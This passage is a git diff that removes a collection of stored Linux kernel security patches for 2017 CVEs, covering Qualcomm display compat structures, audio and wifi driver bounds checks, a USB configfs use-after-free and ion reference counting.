-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- return -EFAULT;
- }
-
-+ memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- pr_err("failed to copy payload from user for igc\n");
- return -EFAULT;
- }
-+
-+ memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- pr_err("failed to copy from user the pgc32 payload\n");
- return -EFAULT;
- }
-+ memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
-
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- pa_cfg_payload.mode = pa_cfg_payload32.mode;
- pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- pr_err("failed to copy the gamut payload from userspace\n");
- return -EFAULT;
- }
-+
-+ memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- gamut_cfg_payload.tbl_size[i] =
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0534/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0534/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0534/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- return -EFAULT;
- }
-
-+ memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- pr_err("failed to copy payload from user for igc\n");
- return -EFAULT;
- }
-+
-+ memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- pr_err("failed to copy from user the pgc32 payload\n");
- return -EFAULT;
- }
-+ memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
-
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- pa_cfg_payload.mode = pa_cfg_payload32.mode;
- pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- pr_err("failed to copy the gamut payload from userspace\n");
- return -EFAULT;
- }
-+
-+ memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- gamut_cfg_payload.tbl_size[i] =
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch
deleted file mode 100644
index bd2d306a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/sound/soc/codecs/rt5506.c b/sound/soc/codecs/rt5506.c
-index 74572c4..fbce69a 100644
---- a/sound/soc/codecs/rt5506.c
-+++ b/sound/soc/codecs/rt5506.c
-@@ -676,6 +676,8 @@
- {
- if (mode >= rt5506_cfg_data.mode_num)
- return -EINVAL;
-+ if (rt5506_cfg_data.cmd_data[mode].config.reg_len > MAX_REG_DATA)
-+ return -EINVAL;
-
- pr_info("%s: set mode %d\n", __func__, mode);
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch.base64
deleted file mode 100644
index d785f6c6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9jb2RlY3MvcnQ1NTA2LmMgYi9zb3VuZC9zb2MvY29kZWNzL3J0NTUwNi5jCmluZGV4IDc0NTcyYzQuLmZiY2U2OWEgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9jb2RlY3MvcnQ1NTA2LmMKKysrIGIvc291bmQvc29jL2NvZGVjcy9ydDU1MDYuYwpAQCAtNjc2LDYgKzY3Niw4IEBACiB7CiAJaWYgKG1vZGUgPj0gcnQ1NTA2X2NmZ19kYXRhLm1vZGVfbnVtKQogCQlyZXR1cm4gLUVJTlZBTDsKKwlpZiAocnQ1NTA2X2NmZ19kYXRhLmNtZF9kYXRhW21vZGVdLmNvbmZpZy5yZWdfbGVuID4gTUFYX1JFR19EQVRBKQorCQlyZXR1cm4gLUVJTlZBTDsKIAogCXByX2luZm8oIiVzOiBzZXQgbW9kZSAlZFxuIiwgX19mdW5jX18sIG1vZGUpOwogCg== \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0536/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0536/ANY/0001.patch deleted file mode 100644 index 24e8b2ed..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0536/ANY/0001.patch +++ /dev/null 
@@ -1,91 +0,0 @@
-From e6430a4da1fb0212a546379eadbe986f629c3ae9 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Fri, 13 Jan 2017 11:41:03 -0800
-Subject: [PATCH] input: synaptics_dsx: protect tmpbuf allocation.
-
-Protect tmpbuf from concurrent access by mutex.
-
-BUG: 33555878
-BUG: 33002026
-Change-Id: Ia7eeb59ca7b626f416e2298b4b9ffd960fe909e4
-Signed-off-by: Andrew Chant
----
- .../synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c | 36 ++++++++++++++--------
- 1 file changed, 24 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-index e699dfea50c81..6878b71da9be0 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-@@ -565,18 +565,24 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-+
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto clean_up;
-+ }
-
- if (count > (REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-
-+ if (count == 0) {
-+ retval = 0;
-+ goto clean_up;
-+ }
- address = (unsigned short)(*f_pos);
-
- rmidev_allocate_buffer(count);
-
-- mutex_lock(&(dev_data->file_mutex));
--
- retval = synaptics_rmi4_reg_read(rmidev->rmi4_data,
- *f_pos,
- rmidev->tmpbuf,
-@@ -636,19 +642,25 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
- if (count > (REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-+ if (count == 0) {
-+ retval = 0;
-+ goto unlock;
-+ }
-
- rmidev_allocate_buffer(count);
-
-- if (copy_from_user(rmidev->tmpbuf, buf, count))
-- return -EFAULT;
--
-- mutex_lock(&(dev_data->file_mutex));
--
-+ if (copy_from_user(rmidev->tmpbuf, buf, count)) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
- retval = synaptics_rmi4_reg_write(rmidev->rmi4_data,
- *f_pos,
- rmidev->tmpbuf,
-@@ -656,8 +668,8 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- if (retval >= 0)
- *f_pos += retval;
-
-+unlock:
- mutex_unlock(&(dev_data->file_mutex));
--
- return retval;
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0537/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0537/ANY/0001.patch
deleted file mode 100644
index 9e080cd4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0537/ANY/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 389b185cb2f17fff994dbdf8d4bac003d4b2b6b3 Mon Sep 17 00:00:00 2001
-From: Jim Lin
-Date: Fri, 13 Jan 2017 16:07:58 +0800
-Subject: FROMLIST: CHROMIUM: usb: gadget: configfs: Fix KASAN use-after-free
-
-When gadget is disconnected, running sequence is like this.
-. android_work: sent uevent USB_STATE=DISCONNECTED
-. Call trace:
- usb_string_copy+0xd0/0x128
- gadget_config_name_configuration_store+0x4
- gadget_config_name_attr_store+0x40/0x50
- configfs_write_file+0x198/0x1f4
- vfs_write+0x100/0x220
- SyS_write+0x58/0xa8
-. configfs_composite_unbind
-. configfs_composite_bind
-
-In configfs_composite_bind, it has
-"cn->strings.s = cn->configuration;"
-
-When usb_string_copy is invoked. it would
-allocate memory, copy input string, release previous pointed memory space,
-and use new allocated memory.
-
-When gadget is connected, host sends down request to get information.
-Call trace:
- usb_gadget_get_string+0xec/0x168
- lookup_string+0x64/0x98
- composite_setup+0xa34/0x1ee8
- android_setup+0xb4/0x140
-
-If gadget is disconnected and connected quickly, in the failed case,
-cn->configuration memory has been released by usb_string_copy kfree but
-configfs_composite_bind hasn't been run in time to assign new allocated
-"cn->configuration" pointer to "cn->strings.s".
-
-When "strlen(s->s) of usb_gadget_get_string is being executed, the dangling
-memory is accessed, "BUG: KASAN: use-after-free" error occurs.
-
-BUG=chrome-os-partner:58412
-TEST=After smaug device was connected to ubuntu PC host, detached and attached
-type-C cable quickly several times without seeing
-"BUG: KASAN: use-after-free in usb_gadget_get_string".
-
-Bug: 31614969
-Change-Id: I58240ee7c55ae8f8fb8597d14f09c5ac07abb032
-Signed-off-by: Jim Lin
-Signed-off-by: Siqi Lin
-(am from https://chromium-review.googlesource.com/#/c/428059/3)
----
- drivers/usb/gadget/configfs.c | 17 ++++++++++++-----
- 1 file changed, 12 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
-index c484d9a..f7d8a3d 100644
---- a/drivers/usb/gadget/configfs.c
-+++ b/drivers/usb/gadget/configfs.c
-@@ -130,21 +130,28 @@ struct gadget_config_name {
- struct list_head list;
- };
-
-+#define MAX_USB_STRING_LEN 126
-+#define MAX_USB_STRING_WITH_NULL_LEN (MAX_USB_STRING_LEN+1)
-+
- static int usb_string_copy(const char *s, char **s_copy)
- {
- int ret;
- char *str;
- char *copy = *s_copy;
- ret = strlen(s);
-- if (ret > 126)
-+ if (ret > MAX_USB_STRING_LEN)
- return -EOVERFLOW;
-
-- str = kstrdup(s, GFP_KERNEL);
-- if (!str)
-- return -ENOMEM;
-+ if (copy) {
-+ str = copy;
-+ } else {
-+ str = kmalloc(MAX_USB_STRING_WITH_NULL_LEN, GFP_KERNEL);
-+ if (!str)
-+ return -ENOMEM;
-+ }
-+ strncpy(str, s, MAX_USB_STRING_WITH_NULL_LEN);
- if (str[ret - 1] == '\n')
- str[ret - 1] = '\0';
-- kfree(copy);
- *s_copy = str;
- return 0;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0564/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0564/ANY/0001.patch
deleted file mode 100644
index c58ee33a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0564/ANY/0001.patch
+++ /dev/null
@@ -1,157 +0,0 @@
-From 941a80cf3340804e488c6ee2742e7a771bd01272 Mon Sep 17 00:00:00 2001
-From: Daniel Rosenberg
-Date: Fri, 3 Feb 2017 20:37:06 -0800
-Subject: [PATCH] ANDROID: ion: Protect kref from userspace manipulation
-
-This separates the kref for ion handles into two components.
-Userspace requests through the ioctl will hold at most one
-reference to the internally used kref. All additional requests
-will increment a separate counter, and the original reference is
-only put once that counter hits 0. This protects the kernel from
-a poorly behaving userspace.
-
-Bug: 34276203
-
-Change-Id: Ibc36bc4405788ed0fea7337b541cad3be2b934c0
-Signed-off-by: Daniel Rosenberg
----
- drivers/staging/android/ion/ion.c | 83 +++++++++++++++++++++++++++++++++++----
- 1 file changed, 76 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-index 73fc9fd4c3e82..fdf761f623201 100755
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -114,6 +114,7 @@ struct ion_client {
- */
- struct ion_handle {
- struct kref ref;
-+ unsigned int user_ref_count;
- struct ion_client *client;
- struct ion_buffer *buffer;
- struct rb_node node;
-@@ -437,6 +438,48 @@ int ion_handle_put(struct ion_handle *handle)
- return ret;
- }
-
-+/* Must hold the client lock */
-+static void user_ion_handle_get(struct ion_handle *handle)
-+{
-+ if (handle->user_ref_count++ == 0)
-+ kref_get(&handle->ref);
-+}
-+
-+/* Must hold the client lock */
-+static struct ion_handle *user_ion_handle_get_check_overflow(struct ion_handle *handle)
-+{
-+ if (handle->user_ref_count + 1 == 0)
-+ return ERR_PTR(-EOVERFLOW);
-+ user_ion_handle_get(handle);
-+ return handle;
-+}
-+
-+/* passes a kref to the user ref count.
-+ * We know we're holding a kref to the object before and
-+ * after this call, so no need to reverify handle. */
-+static struct ion_handle *pass_to_user(struct ion_handle *handle)
-+{
-+ struct ion_client *client = handle->client;
-+ struct ion_handle *ret;
-+
-+ mutex_lock(&client->lock);
-+ ret = user_ion_handle_get_check_overflow(handle);
-+ ion_handle_put_nolock(handle);
-+ mutex_unlock(&client->lock);
-+ return ret;
-+}
-+
-+/* Must hold the client lock */
-+static int user_ion_handle_put_nolock(struct ion_handle *handle)
-+{
-+ int ret;
-+
-+ if (--handle->user_ref_count == 0)
-+ ret = ion_handle_put_nolock(handle);
-+
-+ return ret;
-+}
-+
- static struct ion_handle *ion_handle_lookup(struct ion_client *client,
- struct ion_buffer *buffer)
- {
-@@ -648,6 +691,25 @@ static void ion_free_nolock(struct ion_client *client, struct ion_handle *handle
- ion_handle_put_nolock(handle);
- }
-
-+/* Must hold the client lock */
-+static void user_ion_free_nolock(struct ion_client *client, struct ion_handle *handle)
-+{
-+ bool valid_handle;
-+
-+ BUG_ON(client != handle->client);
-+
-+ valid_handle = ion_handle_validate(client, handle);
-+ if (!valid_handle) {
-+ WARN(1, "%s: invalid handle passed to free.\n", __func__);
-+ return;
-+ }
-+ if (handle->user_ref_count == 0) {
-+ WARN(1, "%s: User does not have access!\n", __func__);
-+ return;
-+ }
-+ user_ion_handle_put_nolock(handle);
-+}
-+
- void ion_free(struct ion_client *client, struct ion_handle *handle)
- {
- BUG_ON(client != handle->client);
-@@ -1513,7 +1575,7 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- data.allocation.flags, true);
- if (IS_ERR(handle))
- return PTR_ERR(handle);
--
-+ pass_to_user(handle);
- data.allocation.handle = handle->id;
-
- cleanup_handle = handle;
-@@ -1529,7 +1591,7 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- mutex_unlock(&client->lock);
- return PTR_ERR(handle);
- }
-- ion_free_nolock(client, handle);
-+ user_ion_free_nolock(client, handle);
- ion_handle_put_nolock(handle);
- mutex_unlock(&client->lock);
- break;
-@@ -1553,10 +1615,15 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- struct ion_handle *handle;
-
- handle = ion_import_dma_buf(client, data.fd.fd);
-- if (IS_ERR(handle))
-+ if (IS_ERR(handle)) {
- ret = PTR_ERR(handle);
-- else
-- data.handle.handle = handle->id;
-+ } else {
-+ handle = pass_to_user(handle);
-+ if (IS_ERR(handle))
-+ ret = PTR_ERR(handle);
-+ else
-+ data.handle.handle = handle->id;
-+ }
- break;
- }
- case ION_IOC_SYNC:
-@@ -1588,8 +1655,10 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- if (dir & _IOC_READ) {
- if (copy_to_user((void __user *)arg, &data, _IOC_SIZE(cmd))) {
- if (cleanup_handle) {
-- ion_free(client, cleanup_handle);
-- ion_handle_put(cleanup_handle);
-+ mutex_lock(&client->lock);
-+ user_ion_free_nolock(client, cleanup_handle);
-+ ion_handle_put_nolock(cleanup_handle);
-+ mutex_unlock(&client->lock);
- }
- return -EFAULT;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0568/ANY/0001.patch
deleted file mode 100644
index 6cc32e48..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From b7fb46c77af4623291f53a5453df733b8fb1fe18 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli
-Date: Fri, 20 Jan 2017 17:32:53 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Heap overflow in wl_run_escan.
-
-1) The default_chan_list buffer overflow is avoided by checking
-n_nodfs index does not exceed num_chans, which is the length
-of default_chan_list buffer.
-2) The SSID length check 32(max limit) is done and then the SSID
-name copied in extra buffer is null terminated. The extra buffer
-is allocated a length of of 33 in wl_iw_ioctl.c.
-3) Issue of chances of cumulative results->pkt_count length
-exceeding allocated memory length of results->total_count is
-avoided in this fix. change_array is the destination array
-whose length is allocated to results->total_count.
-
-Signed-off-by: Sudhir Kohalli
-
-Bug: 34197514
-Bug: 34199963
-Bug: 34198729
-
-Change-Id: I0cd268ab696daac938a99f451607a3f4b2cfaed3
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 12 +++++++++++-
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 9 ++++++++-
- 2 files changed, 19 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index ec2c347ca6219..95bfe2729855f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3622,7 +3622,17 @@ void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_
- }
-
- change_array = ¶ms->change_array[params->results_rxed_so_far];
-- memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count);
-+ if ((params->results_rxed_so_far + results->pkt_count) >
-+ results->total_count) {
-+ DHD_ERROR(("Error: Invalid data reset the counters!!\n"));
-+ *send_evt_bytes = 0;
-+ kfree(params->change_array);
-+ params->change_array = NULL;
-+ return ptr;
-+ }
-+
-+ memcpy(change_array, results->list,
-+ sizeof(wl_pfn_significant_net_t) * results->pkt_count);
- params->results_rxed_so_far += results->pkt_count;
-
- if (params->results_rxed_so_far == results->total_count) {
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 6cadcb56582be..063d49015e5a6 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2288,6 +2288,9 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- /* allows only supported channel on
- * current reguatory
- */
-+ if (n_nodfs >= num_chans)
-+ break;
-+
- if (channel == (dtoh32(list->element[j])))
- default_chan_list[n_nodfs++] =
- channel;
-@@ -9315,8 +9318,12 @@ wl_notify_pfn_status(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- struct wiphy *wiphy = bcmcfg_to_wiphy(cfg);
- #endif /* GSCAN_SUPPORT */
-
-- WL_ERR((">>> PNO Event\n"));
-+ if (!data) {
-+ WL_ERR(("Data is NULL!\n"));
-+ return 0;
-+ }
-
-+ WL_DBG((">>> PNO Event\n"));
- ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
-
- #ifdef GSCAN_SUPPORT
diff --git a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0568/ANY/0002.patch
deleted file mode 100644
index 599e4f30..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0002.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From a3f3e7ed54aaa4f5f6929f1ed460363fdc8964d6 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Fri, 13 Jan 2017 16:25:59 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix overrun in wl_run_escan
-
-prevent buffer overrun case where WLC_GET_VALID_CHANNELS IOCTL
- overriden by attacker and its return manipulated.
-
-Signed-off-by: Insun Song
-Change-Id: Ifbbaa3c2bdfd9bea7533d605303f18e17c8d85cc
-Bug: 34197514
----
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 41d07d310a7b2..c635b1b8a79af 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2268,6 +2268,15 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- if (!wl_get_valid_channels(ndev, chan_buf, sizeof(chan_buf))) {
- list = (wl_uint32_list_t *) chan_buf;
- n_valid_chan = dtoh32(list->count);
-+
-+ if (n_valid_chan > WL_NUMCHANNELS) {
-+ WL_ERR(("wrong n_valid_chan:%d\n",
-+ n_valid_chan));
-+ kfree(default_chan_list);
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+
- for (i = 0; i < num_chans; i++)
- {
- _freq = request->channels[i]->center_freq;
diff --git a/Patches/Linux_CVEs/CVE-2017-0569/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0569/3.10/0001.patch
deleted file mode 100644
index 6cc32e48..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0569/3.10/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From b7fb46c77af4623291f53a5453df733b8fb1fe18 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli
-Date: Fri, 20 Jan 2017 17:32:53 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Heap overflow in wl_run_escan.
-
-1) The default_chan_list buffer overflow is avoided by checking
-n_nodfs index does not exceed num_chans, which is the length
-of default_chan_list buffer.
-2) The SSID length check 32(max limit) is done and then the SSID
-name copied in extra buffer is null terminated. The extra buffer
-is allocated a length of of 33 in wl_iw_ioctl.c.
-3) Issue of chances of cumulative results->pkt_count length
-exceeding allocated memory length of results->total_count is
-avoided in this fix. change_array is the destination array
-whose length is allocated to results->total_count.
-
-Signed-off-by: Sudhir Kohalli
-
-Bug: 34197514
-Bug: 34199963
-Bug: 34198729
-
-Change-Id: I0cd268ab696daac938a99f451607a3f4b2cfaed3
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 12 +++++++++++-
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 9 ++++++++-
- 2 files changed, 19 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index ec2c347ca6219..95bfe2729855f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3622,7 +3622,17 @@ void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_
- }
-
- change_array = ¶ms->change_array[params->results_rxed_so_far];
-- memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count);
-+ if ((params->results_rxed_so_far + results->pkt_count) >
-+ results->total_count) {
-+ DHD_ERROR(("Error: Invalid data reset the counters!!\n"));
-+ *send_evt_bytes = 0;
-+ kfree(params->change_array);
-+ params->change_array = NULL;
-+ return ptr;
-+ }
-+
-+ memcpy(change_array, results->list,
-+ sizeof(wl_pfn_significant_net_t) * results->pkt_count);
- params->results_rxed_so_far += results->pkt_count;
-
- if (params->results_rxed_so_far == results->total_count) {
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 6cadcb56582be..063d49015e5a6 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2288,6 +2288,9 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- /* allows only supported channel on
- * current reguatory
- */
-+ if (n_nodfs >= num_chans)
-+ break;
-+
- if (channel == (dtoh32(list->element[j])))
- default_chan_list[n_nodfs++] =
- channel;
-@@ -9315,8 +9318,12 @@ wl_notify_pfn_status(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- struct wiphy *wiphy = bcmcfg_to_wiphy(cfg);
- #endif /* GSCAN_SUPPORT */
-
-- WL_ERR((">>> PNO Event\n"));
-+ if (!data) {
-+ WL_ERR(("Data is NULL!\n"));
-+ return 0;
-+ }
-
-+ WL_DBG((">>> PNO Event\n"));
- ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
-
- #ifdef GSCAN_SUPPORT
diff --git a/Patches/Linux_CVEs/CVE-2017-0570/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0570/3.10/0001.patch
deleted file mode 100644
index 6cc32e48..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0570/3.10/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From b7fb46c77af4623291f53a5453df733b8fb1fe18 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli
-Date: Fri, 20 Jan 2017 17:32:53 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Heap overflow in wl_run_escan.
-
-1) The default_chan_list buffer overflow is avoided by checking
-n_nodfs index does not exceed num_chans, which is the length
-of default_chan_list buffer.
-2) The SSID length check 32(max limit) is done and then the SSID
-name copied in extra buffer is null terminated. The extra buffer
-is allocated a length of of 33 in wl_iw_ioctl.c.
-3) Issue of chances of cumulative results->pkt_count length
